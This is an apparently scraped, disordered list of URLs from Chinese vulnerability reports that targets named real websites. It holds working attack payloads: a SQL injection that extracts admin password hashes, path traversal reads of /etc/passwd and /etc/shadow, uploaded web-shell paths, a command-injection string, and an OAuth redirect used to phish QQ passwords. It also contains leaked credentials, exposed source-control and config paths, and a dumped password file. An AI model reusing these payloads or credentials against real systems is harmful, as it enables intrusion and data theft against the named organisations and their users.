http://**.**.**.**/Z_show.asp?ArticleID=1925%20&parentclassname=3 http://**.**.**.**/database/ http://www.nissay-greatwall.com.cn/product/product.php?aid=126 http://campus.coolpad.com//index.php?c=schoolRecruitment&cate=internetBusy*&f=jobPosition http://www.glball.com/index.php/product/search?DeadLine=3&IssuerName=%22* http://rap.qian360.com/org/index.do http://shop.taikang.com/tkecs/service/memberinfo/init?&member_id=13888612&flow_id=1001 http://mall.cmbc.com.cn/ http://**.**.**.**/ProductView.Asp?id=6 http://**.**.**.**/e/searchcompany/?id=975046 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/fang-an/dian-xing-ke-hu http://**.**.**.**/case.html http://**.**.**.**/c6/Jhsoft.Web.login/PassWordNew.aspx http://**.**.**.**/c6/JHSoft.MobileApp/Login/login.html http://**.**.**.**/ http://**.**.**.**/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 www.xiaozufan.com http://221.237.153.40:86/ http://221.237.153.40:86/general/vmeet/wbUpload.php?fileName=test.php+ www.dictbee.com http://**.**.**.**/Website/xjlist.jsp http://www.zs6y.com/aboutus.aspx?code=0201 http://www.zs6y.com/Department.aspx?code=030211 http://www.zs6y.com/DoctorDetail.aspx?id=222&code=1101 http://www.h-h.com.cn/Flight/Tuigai.aspx?air=KN5818&cw=E&stype=0 http://www.h-h.com.cn/Flight/Flight_show.aspx http://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://nWQxM.fawziya.cn&www.qq.com http://paypassport.suning.com/ids/oauth20/authorize中的redirect_uri跳转漏洞,跳转到仿造QQ空间的网站,同时对账号密码进行验证与记录(成功登录会跳转至本人QQ空间,错误提示重试。) http://nWQxM.fawziya.cn http://**.**.**.**/jxjy/query.do?method=downloadFile&type=xls&path=web-inf\web.xml&ajax=AJAX http://**.**.**.**/jxjy/query.do?method=downloadFile&type=xls&path=login.jsp&ajax=AJAX http://dmoa.cofco.com/seeyon/index.jsp http://mail.cofcorice.com/ http://www.cofcorice.com/,在人才招聘处可以注册,这里我注册了一个111@qq.com http://jwzx.cic.tsinghua.edu.cn/tsinghua/pub_message/message.jsp?fmodulecode=5700&modulecode=5701&messageid=10211 http://yangtai.xunlei.com/ http://yangtai.xunlei.com/?author= http://yangtai.xunlei.com/xmlrpc.php http://**.**.**.** http://**.**.**.**/flight/Tuigai.aspx?air=321&cw=&stype=1 http://**.**.**.**/flight/Flight_show.aspx http://love.dangdang.com/ad/ http://love.dangdang.com/public/file/ http://xg.hbwj.com.cn http://hg.hbjzj.com.cn http://yc.hbwj.com.cn/ http://yc.hbwj.com.cn/Page/ http://yc.hbwj.com.cn/Page/N2013_CostPage/StudentChargeGrid.aspx http://yc.hbwj.com.cn/Page/N2013_CostPage/MasterChargeGrid.aspx http://yc.hbwj.com.cn/Page/N2013_CostPage/MasRecGrid.aspx http://xn.hbwj.com.cn/Page/N2013_CostPage/StuRecGrid.aspx http://xn.hbwj.com.cn/ http://xn.hbwj.com.cn/Page/ http://xn.hbwj.com.cn/Page/N2013_CostPage/MasterChargeGrid.aspx http://xn.hbwj.com.cn/Page/N2013_CostPage/StuRecGrid.aspx http://xn.hbwj.com.cn/Page/N2013_CostPage/StudentChargeGrid.aspx http://sz.hbwj.com.cn/ http://sz.hbwj.com.cn/page/ http://www.zhenrenyi.com/admin/index http://211.162.66.163:9999/login.action http://ad.v1.cn/ https://**.**.**.**/zhumengle/lexindaweixinframe/blob/cc07ab1001fc0dbc1f1e8e3b18ef315a746a7270/lexindaframe/src/main/resource/mail.properties http://**.**.**.**/PublicInfoList.aspx http://**.**.**.**/PublicInfoList.aspx?key=1&type=1&department=&begindate=&enddate= http://**.**.**.**/InformationView.aspx?InfoCode=0e4c819f-9bc9-4c9e-b834-0b88dbc825c1 http://**.**.**.**/NewsBolckSecondList.aspx?class=d0f31435-11a7-4f41-bf35-11260336cb99&parentclass=c4c7a08a-5dbd-4791-88ee-d82af4ce4f8a http://t.ufida.com.cn/Service.asmx?WSDL http://tong.ufida.com.cn/Service.asmx?WSDL http://tempuri.org/PRM_Support http://tong.ufida.com.cn/Service.asmx?WSDL http://mylib.duxiu.com/a/showMsg.action?msgid=115236 http://**.**.**.**/zt2014/2014graduate/news.php?id=4896 http://www.smgjj.com/BusinessConsulting.aspx http://www.smgjj.com/BusinessConsulting.aspx http://lib.utibet.edu.cn/news.jsp?nid=news20150715_1024 http://lib.utibet.edu.cn/notice_duzhe.jsp?tid=tz20131115_2257 http://lib.utibet.edu.cn/notice_guanyuan.jsp?tid=tz20131115_2343 http://lib.utibet.edu.cn/picnews.jsp?nid=news20150715_1024 http://tyclub.telefen.com/newjf_hgo2/html/HGOIndex_em.html GET:http://tyclub.telefen.com/newlife/interface/setMsCode?DeviceNo=+手机号码+&SmsCode=13 GET:http://tyclub.telefen.com/newlife/interface/msCodeLogin?Mobile=+手机号+&MsCode=+验 http://www.glszcits.com/showArticle.asp?id=556 http://www.glszcits.com/showArticle.asp http://sqlmap.org http://**.**.**.**/ http://**.**.**.**/index.php/Product/detail/id/145 http://**.**.**.**:80/index.php/Product/detail/id/145 http://url/log/system.log http://url/log/vpn.log http://url/log/mobile.log http://url/log/firewall.log http://url/log/access.log http://url/log/warn.log http://url/log/error.log http://url/log1/debug.log http://地址/cgi-bin/index?oid=10&session_id=通过“system.log”文件获取&l=0 http://www.shsb.cn:8081/medias/2.aspx http://www.shsb.cn:8081/medias/3.aspx http://www.shsb.cn:8081/medias/4.aspx http://www.shsb.cn:8081/medias/5.aspx http://www.shsb.cn:8081/medias/6.aspx https://vicp.ecpic.com.cn/sxcb/phone/customer/getUserInfo.do https://vicp.ecpic.com.cn http://m.duomi.com/down/model_list.php?brand_id=14&fi http://crbccms.com:8888/ http://**.**.**.**/article.php?aid=42 http://**.**.**.**/jwr/userlogin/loginAction.action,如图所示: http://envi.ruc.edu.cn/competition/dede/index.php http://envi.ruc.edu.cn/competition/rili/wp-admin/ http://115.47.56.82:80/ http://115.47.56.82:80/ http://shop.neusoft.edu.cn/ChocolateServlet?id=* http://shop.neusoft.edu.cn/Findfoodservlet?food_name=*&order_list_title=%25E7%259B%2596%25E9%25A5%25AD%25E7%25B1%25BB&_=1439687116971 http://shop.neusoft.edu.cn/InterestFoodDetailServlet?food_id=cho2013111813324027 http://shop.neusoft.edu.cn/LatticeServlet http://**.**.**.**/mobiletemplate/Login.aspx index.php/news/search?keywords=999999 https://qian.tenpay.com/mqq/action/financing150727/hb_open.shtml?stat_data=fm_137_gdtlcj_36&prize=******* http://ss.pkusz.edu.cn/ http://www.neuedu.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://**.**.**.**/ http://**.**.**.**:22080/hcdzsb/rbac/logon.do http://**.**.**.**:8088/hcdzsb/rbac/logon.do filetype:doc http://club.sgsbaye.com/uc_server http://117.121.137.4/ http://117.121.137.4/?proc=9&req=801&resource=secure http://mail.szpku.edu.cn/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/manage/admin_login.asp http://**.**.**.**/index.php?s=/Department/staff/id/5 http://cigna.sysu.edu.cn:80/main/news/NewsList.aspx?pId=12&no=1 http://www.wochacha.com/ http://www.wochacha.com/interface_getbasecity.html http://www.moootooo.com/ http://112.124.33.6/mpsf/loginAction.action dir:/root/apache-tomcat-6.0.35/webapps/mpsf/ http://112.124.33.6/mpsf/images/wooyun.jsp http://passport.hzins.com/retrieve http://**.**.**.**/ http://**.**.**.**/)可是鼎鼎有名的卖房中介,跑去东看看西看看~ http://**.**.**.**/QAList.aspx?search= http://**.**.**.**/ http://**.**.**.**/g23_echo_magazine.php?rootid=1&year=2015 http://**.**.**.**/g23_echo_magazine.php?rootid=1&year=2015 http://www.wstmall.com/ http://bbs.z.ztgame.com/uc_server http://bbs.z.ztgame.com/uc_server/helpss.php http://mis.998.com/GreenTreeInn/Login.aspx http://oa.998.com/login/Login.jsp http://oa.998.com/login/Login.jsp http://101.227.68.206/home/login http://mis.998.com:5655/Home/Logon http://bill.998.com/login http://101.227.68.206/ inurl:lres/study/lecture.html http://**.**.**.**/,用的是siteserver http://**.**.**.**:806/vmain/login.jsp http://**.**.**.**:806/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid= http://**.**.**.**:806//picstore/fbb204a4061ffbd41284a84c258c1bfb.jsp无密码 http://icp.now.cn/data/admin.php http://icp.now.cn/admin/login.php http://tongji.myfund.com/phpmyadmin/ http://drops.wooyun.org/papers/7830 http://s18.37wan.sgws.ate.cn/tapi/v1/otplat/login?platform=xxxxxx http://s18.37wan.sgws.ate.cn/proxy/getvjs/x52/18 http://res.ly.sgws.g.1360.com/static/52xiyou/js/logic1.2.js u.muzhiwan.com/api/inc/.svn/entries u.muzhiwan.com/api/.svn/entries u.muzhiwan.com/class/.svn/entries u.muzhiwan.com/common/.svn/entries http://www.erongdu.com/KejIeRongdU2014/ http://www.erongdu.com/robots.txt http://new.pianke.me/ http://www.plgjj.com/search.asp http://42.159.27.54/view_initIndexPageForCustomer.action http://42.159.27.54/view_initIndexPageForCustomer.action http://youxi.miercn.com/log.txt http://**.**.**.**/list.php?c=7 http://ll.fj10010.com/fa/faLoginAction!loginOut.action?accountType=0 http://202.118.83.94:85/public/ShowTutorInfo.aspx?ID=20041025&spec=13 http://scan.cninsure.net pMQgbrmCELKt:14jbakc78 http://drops.wooyun.org/tips/349 http://drops.wooyun.org/tips/349,解出来了数据库的密码 http://news.zjicm.edu.cn/www.rar http://ejk.czinfo.net/login.php http://ejk.czinfo.net/announce_view.php?id=5 http://ejk.czinfo.net/ep_user_edit.php?orgid=&page=1&id=1063 http://ejk.czinfo.net/channel_edit.php?devid=SWIT-VIDSEC-0x0001507-8FE77012&id=135&page=1&oid= http://ejk.czinfo.net/mobi/3g/login.php http://baike.meadin.com/control/login/ inurl:kuwo.cn/cafe/jsp/ http://mail.utibet.edu.cn/ http://oa.21cn.com:9090/login.do?message=110&verify= com:9090 http://oa.21cn.com:9090 http://www.haikongjinrong.com/tmp http://219.216.227.241:9980/ http://**.**.**.**/ http://**.**.**.** http://zc.xmgps.com http://zc.xmgps.com/Webgps/WebPost_Test.aspx http://zc.xmgps.com/Login.aspx http://my.360dns.com/Login/forget_password.html http://analytics.yonghongtech.com:8080/bi/Viewer http://analytics.yonghongtech.com:8080/bi/Viewer?proc=2&resource=../../../../../../../etc/passwd http://www.minsco-fj.com/cn/indexnews.asp?id=57 inurl:/hrss,wooyun搜/hrss/的案例比较多 http://career.sdebank.com/hrss/dorado/smartweb2.RPC.d?__rpc=true file:///etc/passwd http://tx.cnfol.com http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1 http://lian.admin5.com/phpmyadmin/ www.cfjsol.com:9988/Home/Index http://im.9158.com http://bbs.renrenche.com/ http://bbs.renrenche.com/config/config_global.php.bak http://bbs.renrenche.com/config/config_ucenter.php.bak http://bbs.renrenche.com/uc_server/admin.php http://roche.hiall.com.cn/k8.php http://**.**.**.**/bugs/wooyun-2015-0134350 http://union.ceair.com/ http://**.**.**.**/website.rar http://job.ceair.com/Index.aspx http://job.ceair.com/FindPwdCardByQuestion.aspx?card=bGYuDkIy%2BDQ= http://job.ceair.com/FindPwdCheckByQuestion.aspx?a=XXXX http://job.ceair.com/FindPwdCheckByQuestion.aspx?a=k4vV9SH8mx0ZRgbMtwV6ttO/USH9YVJY http://**.**.**.**/names.nsf?Login&Username=luoyi&Password=196373&RedirectTo=/Produce/WeboaConfig.nsf/HomeForm?OpenForm http://ets-ccaa.open.com.cn/Login.aspx https://www.sunfobank.com/logining.html?paramMap.password=admin¶mMap.code=135791&coverPassword=admin¶mMap.pageId=userlogin¶mMap.email=admin@admin.com9988 http://xcd.xeeyu.net/UserLogin.aspx http://xcd.xeeyu.net http://**.**.**.**/)主站的SQL漏洞,随意注入点: http://**.**.**.**/agentdetail.asp?id=l7233 http://shell.cnfol.com/article/recomend_newjson.php?id=1975&record=4&len=22&call= http://**.**.**.**/login.jsp http://**.**.**.**/index.shtml),注入点: http://**.**.**.**/allfangx/sunco.action.NewsListAction.do?optiontype=getNewsList&type=-2 http://t.yahui.cc/index.php?mod=yahuizhongguo http://t.yahui.cc/index.php?mod=yahuizhongguo%df http://city.zol.com/bid_api/web/getDealers?bid=402880552acc07e2012acc09f7da08b8 http://shell.cnfol.com/hk_stock/holder.php?num=20 http://shell.cnfol.com/hk_stock/rating.php?num=20 http://wooyun.org/bugs/wooyun-2010-0125053漏洞提到的号码:15683401303为例说明 http://220.250.65.185/ http://220.250.65.185 https://218.26.97.178/ http://momdc.sysu.edu.cn/searchonc1.asp?Brows_Bio=[sql]搜索get过来的参数基本存在注入(不一一列举了) http://momdc.sysu.edu.cn/searchonc2.asp?bio_SR=[sql http://momdc.sysu.edu.cn/comp_Detail.asp?onc_ID=[sql http://**.**.**.**/bugs/wooyun-2010-065966 http://**.**.**.**/ http://**.**.**.**:8089 http://**.**.**.**:8089/ http://finechem.sysu.edu.cn/foot.aspx?cate=g3 http://finechem.sysu.edu.cn/foot.aspx?cate=g3 http://finechem.sysu.edu.cn/foot.aspx?cate=g3 http://jump.im.baidu.com/jump.html?imver=4%2C7%2C1%2C2&langid=2052&goid=101&url=https%3A%2F%2Fpassport%2Ebaidu%2Ecom%2Flogm%3Ftpl%3Dhi%26cv%3D0%26cert%5Fid%3D1%26id%3D%25C2%25F4%25C3%25C8%25B5%25C4%25D6%25D0%25B6%25FE%26t%3D1439778839%26sauth%3Duo7tR6ysIo5%252Fvh%252FiF7ZSbJHTLa%252FnCgJmVUasw0NgXSHnRVKgwdRt7t7Mvj%252B6V6hCwmc%252BVTLSXXO2vydtVPPT0bOSFjQrtt3qgCEj6xc5vu54E5JyS6IzkT1sk6qRYB89qpXpN3NYwQ3OzX1Ew6ME%252FQcBzPQy0lKDlYQ1Yj4kt1U%253D%26u%3Dhttp%253A%252F%252Fhi%252Ebaidu%252Ecom%252Fsys%252Freg%253Fpspref%253Dimclient&loginid=%C2%F4%C3%C8%B5%C4%D6%D0%B6%FE&p=19000 https://reg.hexun.com/bindbaidu.aspx?gourl=aHR0cDovL2hleHVuLmNvbS9uZXdob21lL3NldC9vcGVuaWQ=&fromhost=hexun.com https://reg.hexun.com/bindbaidu.aspx?gourl=11111111111111111111111111111111111=&fromhost=hexun.com http://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=x0jcd8PuoDCCrxGDxfmdaXRZ&redirect_uri=http://reg.hexun.com/bindBaidu.aspx&scope=super_msg&display=page&state=aHR0cDovL2hleHVuLmNvbS9uZXdob21lL3NldC9vcGVuaWQjLS0tI2hleHVuLmNvbSMtLS0jIy0tLSMjLS0tIw== http://m.tianhong.cn/member/member_update_address.html?addressId=50110641&isShow=Y http://m.tianhong.cn/member/member_update_address.html?addressId=50160641&isShow=Y http://**.**.**.**/product.php?CID=1&ID=18 http://blog.chukong-inc.com/wp-login.php http://tms.tianhong.cn:8877/ http://tms.tianhong.cn:8877/orderSearchAction.do?method=searchOrder&index=1# http://tms.tianhong.cn:8877/orderSearchAction.do?method=getDetail&txlogisticid=231764813501 http://tms.airchinaf.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://tms.airchinaf.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://**.**.**.**/bugs/wooyun-2015-0108778而发 http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/massage/massage_list.jsp?user_id=6521&user_name=&real_name=&corp_name= http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/memberCenter/gqInfo/MyGqInfoList.jsp?user_id=6522 http://**.**.**.**/chanpinz/p/1 https://**.**.**.**/succour/leicaproxy/blob/31bd1d19bc1a6c653778f451e03fb0b433b00bdf/src/main/java/com/royal/dealer/web/tools/mail/MailTest.java http://gsv.muzhiwan.com/ http://www.58.com/jk/ http://www.58.com/jk/index.php?admin_main http://m.58.ufstone.net:8014/jk/ http://www.58.com/jk/dbCenter/ http://www.pywm.com.cn/fund_net_product---act--detail__product_id--42*.html ip:60.28.230.77 http://**.**.**.**/Site/Index http://**.**.**.**/ http://**.**.**.**/manage/login.aspx https://www.yuancredit.com/ http://radm.chanjet.com http://125.35.5.144:81/fixsys/Default.aspx http://law.tencent.com:88/www/phpmyadmin/index.php http://law.tencent.com:88/www/phpinfo.php http://drops.wooyun.org/papers/3771 http://suggestion.baidu.com/su;/1.bat?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 http://60.shisu.edu.cn/category.php?cid=7 http://**.**.**.**/.svn/entries http://zhanzhang.baidu.com http://admin.lingd.com/vote_show.php?pollid=9 http://**.**.**.**/web/index.php http://**.**.**.**:89 http://www.1314hua.cn/ http://www.xianglixiang1314.com/ http://www.1314ya.com/ site:xianglixiang1314.com以下……太多了 http://www.1314hua.cn/UserCenter_OrderListRecent.aspx?OrderId=1%27%20or%20OrderId%3E%272013 http://www.1314hua.cn/UserCenter_OrderListRecent.aspx?OrderId=1 www.1314hua.cn https://github.com/feiniu7903/feiniu_pet/blob/781d571b8e663ce0c5a98b556a11c1638e22990a/pet/pet_search/src/main/java/com/lvmama/search/util/mail/MyAuthenticator.java http://**.**.**.**/InformationView.aspx?InfoCode=-1 http://**.**.**.**/pub/news.asp?ctyp=NEWS&catid=1747&ctxid=535525 http://rsc.bjedu.gov.cn/search.jsp?range=titleandcontent%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&keywords=1 http://**.**.**.**/registration/registInit.action http://www.183read.com/user/login/index http://www.183read.com http://whois.chinaz.com/lcy8.cc http://wooyun.org/bugs/wooyun-2014-080099 http://pan.baidu.com/s/1bn37KOR http://wooyun.org/bugs/wooyun-2010-080099 http://easytoyou.eu http://admin.imtoutiao.com/index.php?m=admin&c=index&a=login http://site.hiall.com.cn/.git/config http://**.**.**.**/login.asp http://comment2.rayli.com.cn/list_comment.php?callback=jQuery17206805726147171625_1439794384634&datepath=2015-06-29&news_id=4100546&nid=&ctype=3&is_sign=2'&_=1439794386674 http://comment2.rayli.com.cn/pageTag.php?callback=jQuery17206805726147171625_1439794384635&datepath=2015-06-29&news_id=4100546&page=1&ctype=3&is_sign=2'&_=1439794386675 http://yxjwc.sysu.edu.cn/preview_news.php?id=3054 http://whois.aliyun.com/whois/domain/lcy8.cc?spm=5334.7477273.3.1 http://**.**.**.**/index.php?m=content&c=index&a=annotation_new_window&ann_id=9 http://**.**.**.**//Investor_AnnouncementDetail.aspx?id=401 https://www.sunfobank.com/ http://exam.chanjet.com/discuz/admin.php http://exam.chanjet.com/discuz/uc_server http://www.xiaozufan.com/ http://zgc.xiaozufan.com/Index/orderToday admin.php/hr/hrlist_edit_submit http://zhaopin.now.cn/ http://ie.115.com/site2/static/js/theme.js http://**.**.**.**/ajaxserve/IndexSaleAjax.aspx?name= http://**.**.**.**/ajaxserve/IndexSaleAjax http://**.**.**.** http://price.ziroom.com/?_p=../../../../../../../../../../ http://xtoa.lbex.net/msg/pages/message_unread.aspx http://xtoa.lbex.net/index.aspx http://xtoa.lbex.net/msg/pages/message_unread.aspx http://121.41.28.105:8001 http://mail.ele.me/ https://office.elenet.me:5757/remote/login http://eoc.elenet.me/ http://**.**.**/ http://**.**.** http://**.**.**/index.php http://172.16.10.25:8081/sso/login?from=http://eve-hr.eleme.test#login http://**.**.**/account/loginnext=%2F http://**.**.**.**/ http://www.183read.com/vote/index_1.html www.183read.com http://www.183read.com http://**.**.**.**/bugs/wooyun-2015-095292 http://**.**.**.**/Item/16631.aspx bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:Daemon:/sbin:/bin/bash gdm:x:107:112:Gnome daemon:/var/lib/gdm:/bin/false haldaemon:x:101:102:User haldaemon:/var/run/hald:/bin/false mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash messagebus:x:100:101:User D-Bus:/var/run/dbus:/bin/false ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false oracle:x:108:113:Oracle user:/opt/oracle:/bin/bash polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false root:x:0:0:root:/root:/bin/bash sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false uuidd:x:102:104:User uuidd:/var/run/uuidd:/bin/false wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false educard:x:1001:113::/mhome/educard:/bin/bash trmsvc:x:1002:113::/mhome/trmsvc:/bin/bash tcomm:x:1003:100::/mhome/tcomm:/bin/bash oratrmudp2:x:1004:113::/mhome/oratrmudp2:/bin/bash educnt:x:1005:113::/mhome/educnt:/bin/bash clamav:x:1006:1000:Clam AntiVirus:/home/clamav:/bin/false trmtst:x:1007:113::/mhome/trmtst:/bin/bash http://60.174.64.196:7001/defaultroot/login.jsp http://wap.jjwxc.net http://www.chinawufeng.com/cold.php?pid=13 http://www.chinawufeng.com/fast.php?pid=25 http://**.**.**.**/visitor/index.action http://**.**.**.**/app/member/resetPwd.action?content=%7B%22password%22%3A%22123456%22%2C%22passwords%22%3A%22123456%22%2C%22loginName%22%3A%2213925668935%22%7D https://**.**.**.**/by_mail http://**.**.**.**/ www.sme999.org http://www.sme999.org/initzj.action http://www.sme999.org/wooyun.txt http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://ipv6.ahut.edu.cn/show.php?id=3 http://www.yiqi1717.com https://itunes.apple.com/cn/app/yi-qi-tong-cheng-dan-shen/id991612683?mt=8 http://voice.cug.edu.cn:8086/gov/index.asp http://voice.cug.edu.cn:8086全都是注入点,在这里只举各别例子 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://voice.cug.edu.cn:8086/gov/list.asp?bid=1 http://agpsd.3g-elec.com:8080/app/public/S10APP/findLastPosition?did={devid}&did_id={did}&language=zhCN http://mis.998.com/GreenTreeInn/Login.aspx http://mis.998.com:8065/Construct_List_New.aspx http://mis.998.com:8065/upfiles/635754391703993832wooyun.aspx http://www.zzbank.cn http://www.8852.com/Page/Article.aspx?aid=645 http://shop.8852.com/a.asp http://kelinmef.sysu.edu.cn/ http://kelinmef.sysu.edu.cn/admin/login.html http://job.neu.edu.cn/ http://**.**.**.**/inforesult.aspx?typeid=%B9%AB%BD%BB%B9%AB%CA%BE&articleid=7273 http://video.happigo.com/index.html http://www.kingcms.com/download/k9/ http://www.focuznet.com/k9/t3012/  http://**.**.**.**/webfront/index.php/myapp/myapp http://**.**.**.**/webfront/index.php/appshelf http://**.**.**.**/webfront/index.php/appshelf http://**.**.**.**/webfront/index.php/appshelf http://**.**.**.**/search http://**.**.**.**/admin/ http://**.**.**.**/BaoMing/BMLogin.aspx http://**.**.**.**/Sundries/getstudentno.aspx www.ganji.com http://xxx/SysFun/UploadPic.htm http://bc.jlslgy.com/ http://sp.jlslgy.com/ http://sy.jlslgy.com/ http://th.jlslgy.com/ http://yb.jlslgy.com/ http://bs.jlslgy.com/ http://cb.jlslgy.com/ http://ly.jlslgy.com/ http://jn.gwbnsd.com/siteserver/forgetPassword.aspx http://jn.gwbnsd.com/siteserver/login.aspx http://jn.gwbnsd.com/upload/files/2015/8/181037223.aspx http://eip.crcchem.com:89/login.do http://cpac.sysu.edu.cn/index.php/article/more/id/6*.html http://www.h-h.com.cn/manage/default.aspx http://www.h-h.com.cn/manage/default.aspx http://218.241.201.153 http://**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts http://**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://www.c-ps.net/ http://ibs.c-ps.net/login/forgot.html http://115.com/?mode=jianli http://www.sootoo.com/content/650379.shtml) http://t.jzt.58.com/weixinorder/cancelorder?orderid=633276032211906560 http://www.coremail.cn:80/label/ajax/hit.aspx http://webmail.xinnet.com xinnet.com/idc-service@xinnet.com http://**.**.**/ http://**.**.**.**/admin/pub_newschannel.asp?chid=100231 http://**.**.**.**/admin/pub_newschannel.asp?chid=100231 https://**.**.**.**/svpn/index.cgi http://www.txcards.com.cn/default.aspx?stype=1&key=a http://m.tuanyanwang.com/event.php?id=4* http://**.**.**.**:81 http://**.**.**.**:81/hbxxfb/Childpage/tztginfo.aspx?Pid=d691ecae-42ce-4999-b360-d46982a15dff http://www.ellechina.com/ellechina.tar.gz http://oa.bestv.com.cn http://oa.bestv.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 http://zhuanti.club.news.sohu.com/user_webpage/webpage_checkview.php?webid=13274 http://zhuanti.club.news.sohu.com/user_webpage/webpage_checkview.php?webid=13274%20and%201=1 http://zhuanti.club.news.sohu.com/user_webpage/webpage_checkview.php?webid=13274%20and%201=2 http://106.37.197.38:2808/106admin https://115.29.37.36/upload.jsp(疑似上传) http://**.**.**.**/ http://**.**.**.**/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://202.108.98.96/civilMessage/login.action http://202.108.98.96/civilMessage/ma.jsp http://202.108.98.96/civilMessage/shell.jsp http://**.**.**.** http://**.**.**.**/web/contact.aspx?code=14011&bcode=1401&scode=14011 http://**.**.**.**/web/EListTP.aspx?Code=3051&bcode=1202&scode=12026&type=game http://**.**.**.**/web/EListTP.aspx?Code=3051&bcode=1202&scode=12026&type=game http://www.cqaipu666.com/news/index.php?catid=0&key=a&imageField.x=31&imageField.y=10 http://sap.karra.com.cn/Account/PwdChange.aspx http://**.**.**.**/index.aspx)是昆山政府旗下唯一人才网: http://**.**.**.**/index.aspx http://**.**.**.**/New_View.aspx?action=view&type=2&infoid=43 www.go.cn http://oa.52mf.cn http://oa.52mf.cn/homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1 http://sina.xiaozufan.com/Account_Service/findPwdPage http://about.ifensi.com/news_info.php?id=136040 http://baolai.hz.letv.com/php/videonum.php?callback=1&id=1 http://220.248.49.149:8080 admin:admin123 http://kuwo.cn/#酷我主站的登陆框,没有任何登陆验证机制 http://oa.52mf.cn:89/login.do http://**.**.**/NewPortal/index.aspx http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/NewPortal/index.aspx_ http://**.**.**/index.aspx_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/ http://en.todaynic.com/email/email_admin.php http://**.**.**.**/cjfc/login/fc_login.jsp?kslbdmCurrent=01&ksqCurrent=1504&zcqCurrent=152%20kslbdmCurrent=01 http://**.**.**.**/cjfc/login/fc_login.jsp?kslbdmCurrent=01&ksqCurrent=1504&zcqCurrent=152%20kslbdmCurrent=01 http://admin.feipiao.cn/mygroupon/index.php http://**.**.**.**/ http://itse.dcits.com/top/system/login.do http://58.18.38.116:7001/cicms/login http://oa.tongji.edu.cn:89 http://weichat.skyworth.com/ http://www.2177s.com/ajax.asp?content=aaa%2527,convert%28int,system_user%29,1%29%20--;&h=saveWeituo&recuser=38180268 http://203.130.41.34/users/sign_in http://203.130.41.34/dealer_infos/180 